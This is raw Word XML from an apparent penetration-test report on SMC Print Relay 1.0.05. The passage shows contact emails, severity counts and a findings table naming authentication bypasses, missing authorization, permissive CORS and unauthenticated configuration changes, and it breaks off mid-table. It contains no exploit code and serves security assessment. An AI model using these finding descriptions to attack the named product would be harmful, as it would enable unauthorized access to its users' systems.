          </w:tcPr>
          <w:p w14:paraId="0803EF80" w14:textId="77777777" w:rsidR="00FD26B8" w:rsidRPr="00BA3BA8" w:rsidRDefault="00FD26B8" w:rsidP="00155B36">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD26B8" w:rsidRPr="00BA3BA8" w14:paraId="004FB010" w14:textId="77777777" w:rsidTr="00A37316">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3798" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="363D9AE8" w14:textId="77777777" w:rsidR="00FD26B8" w:rsidRPr="00BA3BA8" w:rsidRDefault="00B560AC" w:rsidP="00765DC1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>EMD.teamthunders@inovalon.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4054" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="746C784A" w14:textId="77777777" w:rsidR="00FD26B8" w:rsidRPr="00BA3BA8" w:rsidRDefault="00FD26B8" w:rsidP="00155B36">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00765DC1" w:rsidRPr="00BA3BA8" w14:paraId="1A86F80C" w14:textId="77777777" w:rsidTr="00A37316">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3798" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="0C220EFC" w14:textId="77777777" w:rsidR="00765DC1" w:rsidRDefault="00B560AC" w:rsidP="00765DC1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>EMD.teamspartans@inovalon.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4054" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="11A5A3BB" w14:textId="77777777" w:rsidR="00765DC1" w:rsidRPr="00BA3BA8" w:rsidRDefault="00765DC1" w:rsidP="00155B36">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4082A23A" w14:textId="77777777" w:rsidR="00F52F49" w:rsidRDefault="00F52F49" w:rsidP="008D0E55">
      <w:pPr>
        <w:spacing w:after="151" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E966847" w14:textId="77777777" w:rsidR="00F52F49" w:rsidRDefault="00F52F49" w:rsidP="003F748C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc232079908"/>
      <w:r>
        <w:t>TIMELINE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2B6A80" w14:textId="77777777" w:rsidR="00F52F49" w:rsidRDefault="00AB48BF" w:rsidP="00543FC0">
      <w:r>
        <w:t>06/10-14/26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA169F8" w14:textId="77777777" w:rsidR="00F52F49" w:rsidRPr="00F57A2E" w:rsidRDefault="00F52F49" w:rsidP="00F52F49">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="67"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc232079909"/>
      <w:r>
        <w:t>TECHNICAL FINDINGS OVERVIEW</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6B3526" w14:textId="77777777" w:rsidR="00F52F49" w:rsidRDefault="00F52F49" w:rsidP="00F52F49">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="1006"/>
          <w:tab w:val="center" w:pos="2883"/>
          <w:tab w:val="center" w:pos="4750"/>
          <w:tab w:val="center" w:pos="6622"/>
          <w:tab w:val="right" w:pos="9431"/>
        </w:tabs>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Critical </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">High </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Medium </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Low </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Informational </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid0"/>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblInd w:w="72" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="3" w:type="dxa"/>
          <w:left w:w="115" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1872"/>
        <w:gridCol w:w="1872"/>
        <w:gridCol w:w="1872"/>
        <w:gridCol w:w="1872"/>
        <w:gridCol w:w="1872"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F52F49" w14:paraId="0F52B6FC" w14:textId="77777777" w:rsidTr="00155B36">
        <w:trPr>
          <w:trHeight w:val="787"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
          </w:tcPr>
          <w:p w14:paraId="6DE2B590" w14:textId="77777777" w:rsidR="00F52F49" w:rsidRDefault="00F52F49" w:rsidP="00155B36">
            <w:pPr>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:ind w:right="6"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="52"/>
              </w:rPr>
              <w:t xml:space="preserve">0 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
          </w:tcPr>
          <w:p w14:paraId="2D5C4F72" w14:textId="77777777" w:rsidR="00F52F49" w:rsidRDefault="00F57A2E" w:rsidP="00155B36">
            <w:pPr>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:ind w:left="4"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="52"/>
              </w:rPr>
              <w:t xml:space="preserve">4 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EC7D31"/>
          </w:tcPr>
          <w:p w14:paraId="4960A540" w14:textId="77777777" w:rsidR="00F52F49" w:rsidRDefault="00F57A2E" w:rsidP="00155B36">
            <w:pPr>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:ind w:right="6"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="52"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="5B9BD5"/>
          </w:tcPr>
          <w:p w14:paraId="1BB0641D" w14:textId="77777777" w:rsidR="00F52F49" w:rsidRDefault="009813DE" w:rsidP="00155B36">
            <w:pPr>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:ind w:right="6"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="52"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="91D050"/>
          </w:tcPr>
          <w:p w14:paraId="58FD7A89" w14:textId="77777777" w:rsidR="00F52F49" w:rsidRDefault="00924C1E" w:rsidP="00155B36">
            <w:pPr>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:ind w:right="6"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="52"/>
              </w:rPr>
              <w:t xml:space="preserve">1 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="73429385" w14:textId="77777777" w:rsidR="00F52F49" w:rsidRDefault="00F52F49" w:rsidP="00F52F49">
      <w:pPr>
        <w:spacing w:after="88" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="72"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C225B70" w14:textId="77777777" w:rsidR="00F52F49" w:rsidRDefault="00F52F49" w:rsidP="00F52F49">
      <w:pPr>
        <w:spacing w:after="81"/>
      </w:pPr>
      <w:r>
        <w:t>For detailed information about all areas of risk identified during this assessment, reference the respective technical findings that are documented within this document. The following discusses the summary details of the assessment. Based on the results of the assessment, Inovalon OST identified the following vulnerabilities within</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SMC Print Relay (1.0.05)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1AB6EC" w14:textId="77777777" w:rsidR="00847585" w:rsidRDefault="00847585" w:rsidP="00F52F49">
      <w:pPr>
        <w:spacing w:after="81"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74E85067" w14:textId="77777777" w:rsidR="00847585" w:rsidRDefault="00847585" w:rsidP="00F52F49">
      <w:pPr>
        <w:spacing w:after="81"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F616300" w14:textId="77777777" w:rsidR="00847585" w:rsidRDefault="00847585" w:rsidP="00F52F49">
      <w:pPr>
        <w:spacing w:after="81"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="261FB9EA" w14:textId="77777777" w:rsidR="00847585" w:rsidRDefault="00847585" w:rsidP="00F52F49">
      <w:pPr>
        <w:spacing w:after="81"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A2C015A" w14:textId="77777777" w:rsidR="008A6DCD" w:rsidRPr="00217429" w:rsidRDefault="008A6DCD" w:rsidP="00936CDC">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:left="72"/>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="753CAE23" w14:textId="77777777" w:rsidR="006D02C2" w:rsidRPr="00F57A2E" w:rsidRDefault="008A6DCD" w:rsidP="00CE19D0">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
        </w:rPr>
        <w:t xml:space="preserve">The following security issues were identified during the engagement.  </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9715" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4675"/>
        <w:gridCol w:w="2070"/>
        <w:gridCol w:w="2970"/>
      </w:tblGrid>
      <w:tr w:rsidR="00803E81" w:rsidRPr="00217429" w14:paraId="500F41C2" w14:textId="77777777" w:rsidTr="00803E81">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="33F169C1"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Finding Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2070" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="4F72E076"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Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2970" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="0519F66C" w14:textId="77777777" w:rsidR="00803E81" w:rsidRPr="00217429" w:rsidRDefault="00803E81" w:rsidP="00B74798">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>Estimated Level of Effort</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C1336" w14:paraId="7E600451" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="745A95FA" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
              <w:t>1. Authentication Bypass via Attacker-Controlled Token Introspection URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2070" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5238843E" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
                <w:b/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2970" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D361211" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C1336" w14:paraId="3B4344DA" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44929814" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
              <w:t>2. Authentication Bypass via Attacker-Controlled OpenID Connect Discovery (B2C Validation Path)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2070" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46E10C76" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
                <w:b/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2970" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42A7D280" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C1336" w14:paraId="0DB41A4F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EB53C8F" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
              <w:t>3. Missing Authorization on the PrintPdf Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2070" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29E0F9DD" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
                <w:b/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2970" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36DE6ACD" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C1336" w14:paraId="08C86189" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51620863" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
              <w:t>4. Overly Permissive CORS Policy Enabling Cross-Site Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2070" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38E8A6F1" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
                <w:b/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2970" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50593162" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C1336" w14:paraId="5A46DA90" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A526B96" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
              <w:t>5. Unauthenticated Modification of the Print-Routing Map</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2070" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16F6106B" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
                <w:b/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2970" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78E091D0" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C1336" w14:paraId="52486383" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B3BA5D8" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>6. Unauthenticated Information Disclosure via Printer Enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2070" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A564002" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
                <w:b/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2970" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09E28657" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C1336" w14:paraId="38343593" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E1E835D" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
              <w:t>7. End-of-Life and Outdated Components Processing Untrusted Input</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2070" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33A25A68" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
